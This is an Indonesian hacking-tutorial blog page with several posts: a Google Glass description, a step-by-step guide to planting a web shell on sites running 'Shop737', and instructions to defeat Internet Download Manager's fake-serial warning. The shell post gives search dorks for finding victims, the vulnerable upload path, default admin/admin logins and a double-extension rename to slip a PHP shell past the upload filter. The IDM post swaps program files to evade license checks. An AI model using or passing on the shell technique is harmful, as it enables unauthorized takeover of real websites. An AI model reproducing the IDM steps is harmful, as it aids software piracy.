CyberCrew-Newbie

Software,Hacking,Security,Tutorial,AntiVirus DLL.

Google Glass Si Kaca Mata Canggih

Selamat malam teman :)
malem minggu nih :v aku dirumah sendiri..aku kan jomblo :v
udah wkwkwk... yang kita bahas bukan itu :v
malam ini kita akan membahas tentang Google Glass

ini nih penampakannya

Google Glass adalah komputer bisa pakai yang sedang dikembangkan oleh Google melalui proyek riset dan pengembangan Project Glass. Perangkat ini menampilkan informasi dalam format bergaya telepon pintar, yang bisa terhubung ke Internet melalui perintah suara bahasa alami.
Saat ini, kacamata yang diproduksi tidak memiliki lensa terpasang, namun Google sedang mempertimbangkan kemitraan dengan produsen kacamata seperti Ray-Ban atau Warby Parker, serta dengan para pengecer, agar konsumen bisa mencoba perangkat sebelum membelinya. Explorer Edition tidak bisa digunakan oleh orang-orang yang memakai kacamata resep, namun Google telah mengonfirmasi bahwa mereka akan berupaya agar Glass bisa beroperasi dengan lensa yang sesuai dengan resep pemakainya.
Google Glass sedang dikembangkan oleh Google X. yang sebelumnya juga telah mengembangkan teknologi futuristis lainnya seperti mobil swatantra. Proyek ini diumumkan melalui Google+ oleh kepala Project Glass,Babak Parviz, seorang teknisi lensa kontak; Steve Lee, seorang manajer produk dan "spesialis geolokasi"; dan Sebastian Thrun, pengembang Udacity yang juga ikut mengembangkan proyek mobil swatantra. Google telah mematenkan desain Project Glass. Thad Starner, seorang pakar teknologi realitas tertambah, adalah pemimpin teknis proyek ini.

Spesifikasi teknis

Untuk edisi pengembang Explorer, spesifikasinya adalah sebagai berikut:
  • Android 4.0.4 ke atas
  • Layar 640×360
  • Kamera 5-megapiksel, kemampuan merekam video 720p
  • Wi-Fi 802.11b/g
  • Bluetooth
  • Penyimpanan 16GB (12 GB tersedia)
  • Texas Instruments OMAP 4430 SoC 1.2Ghz Dual(ARMv7)
  • 682MB RAM
  • Giroskop 3 axis
  • Akselerometer 3 axis
  • Magnetometer (kompas) 3 axis
  • Sensor cahaya ambient dan sensor proksimitas 
  • Transduser konduksi tulang

Referensi

  1. Miller, Claire Cain (20 February 2013). "Google Searches for Style". The New York Times. Diakses 5 March 2013.
  2. Faqs - Glass Press".
  3. Coldewey, Devin (23 February 2013). "Google Glass to launch this year for under $1,500". NBC News.com Gadgetbox. Diakses 23 February 2013.
  4. Etherington, Darrell (18 April 2013). "Larry Page Says Google Glass Runs On Android". TechCrunch. Diakses 18 April 2013.
  5. These Are Google Glass's CPU and RAM Specs | Gizmodo UK April 26, 2013 - 7:30pm
  6. Torberg, Scott (11 June 2013). "Google Glass Teardown". TechRadar. Diakses 12 June 2013. "'With a native resolution of 640x360, the pixels are roughly 1/8th the physical width of those on the iPhone 5's retina display.'"
  7. "Tech specs". Google. 16 April 2013. Diakses 18 April 2013.
  8. Goldman, David (4 April 2012). "Google unveils 'Project Glass' virtual-reality glasses". Money (CNN). Diakses 4 April 2012.
  9. Albanesius, Chloe (4 April 2012). "Google 'Project Glass' Replaces the Smartphone With Glasses". PC
Tjieee.. . . pengen ya? beli aja wkwkwk :v

Comments
0 Comments

Cara Tanam Shell Dengan Teknik Shop737

Selamat siang sob :)
kali ini saya kasih tau Cara Tanam Shell Dengan Teknik Shop737
shop737 itu bug lama tapi baru ngtrend sekarang wkwkwk :v
yaudah langsung saja ke TKP. . .

sebelumnya siapkan shell nya,
shellnya harus di rename terlebih dahulu
kasih .xxxjpg dibelakang shell
menjadi shell.php.xxxjpg

dork via googleintext:"Powered by Shop737"
dork via bingIP: 103.29.215.201 "/poto/"
note: 103.29.215.201 -> ip bisa di ganti

exploit: /poto/upload.php
contoh: wwwtarget.com/poto/upload.php

saya asumsikan sudah dapat web yang vuln..

 www.target.com/poto/


sekarang kita kasih exlpoitnya
jadi wwwtarget.com/poto/upload.php


suruh masukin username sama password

username: admin
password: admin


liat gambar di atas^
upload shell anda tadi yang sebelumnya sudah di rename.
hasilnya www.target.com/poto/[kategori]/shell.php.xxxjpg



Semoga bermanfaat :)
Comments
0 Comments

Cara Menghilangkan Window Pop-up "Fake Serial Number" IDM

Selamat siang sob :)
pernah melihat pesan error Fake Serial Number IDM seperti di bawah?

Penampakan




kalo pernah ini ada solusi nya :D

1. Tutup IDM di tray icon yang ada pojok kanan bawah.
lalu Klik kanan - Exit.
2. Buka direktori IDM, secara default nya ada di.
C:\Program Files\Internet Download Manager
3. Cari file bernama "IDMGrHlp.exe" kemudian rename menjadi "idmhelp_old.exe" (tanpa tanda petik).
4. Cari file bernama "idmBroker.exe" kemudian rename menjadi "IDMGrHlp.exe" (tanpa tanda petik).
5. Restart Komputer anda.
6. Selesai.


Semoga bermanfaat :)
Comments
0 Comments

Download HTML-Kit

Selamat siang sob. . .
kalian tau notepad? itu lho program text editor. . .
apa jangan2 juga uda pernah gunain?
tapi yang di bahas bukan notepat lho wkwkwk :v
masih satu sodara sama notepad program ini juga digunakan sebagai text editor
yappp.. nama nya HTML-Kit
langsung saja ya sob. .
link download ada di bawah :)


Download Disini

Semoga bermanfaat :)


Comments
0 Comments
Diberdayakan oleh Blogger.
 

Visitor



free counters

My Banner

  

Pengikut

Continue Reading →